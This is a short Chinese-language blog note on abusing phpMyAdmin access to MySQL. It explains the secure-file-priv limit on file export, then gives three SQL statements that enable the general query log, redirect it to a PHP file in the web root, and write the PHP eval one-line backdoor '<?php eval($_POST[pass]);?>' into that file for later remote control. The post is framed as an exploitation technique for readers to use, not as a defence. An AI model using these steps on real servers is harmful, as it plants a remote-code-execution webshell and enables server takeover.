phpmyadmin利用log日志文件插入一句话

笔记 185 字 大概 1 分钟 362 次
返回错误 ‘The MySQL server is running with the --secure-file-priv option so it cannot execute this statement’,这是因为mysql对通过文件导入导出作了限制,默认不允许。默认value值为null,则为禁止,如果有文件夹目录,则只允许改目录下文件(测试子目录也不行)。

2018061708172055.png

shell写出过程

2018061708191497.png

  • general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。
  • general log file 指的是日志的保存路径。
  • general_log 的作用:开启它可以记录用户输入的每条命令,会把其保存在E:\phpstudy\PHPTutorial\MySQL\data\下的一个log文件中。
  • 利用思路:开启general_log之后把general_log_file的值修改为网站路径下一个自定义的php文件中,然后通过log日志写入一句话后门。

利用code

set global general_log = "ON";
SET global general_log_file='E:/WWW/infos.php';
select '<?php eval($_POST[pass]);?>';

接下来链接 infos.php 即可.

思路来源:i春秋

文章目录
END

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。

发表感想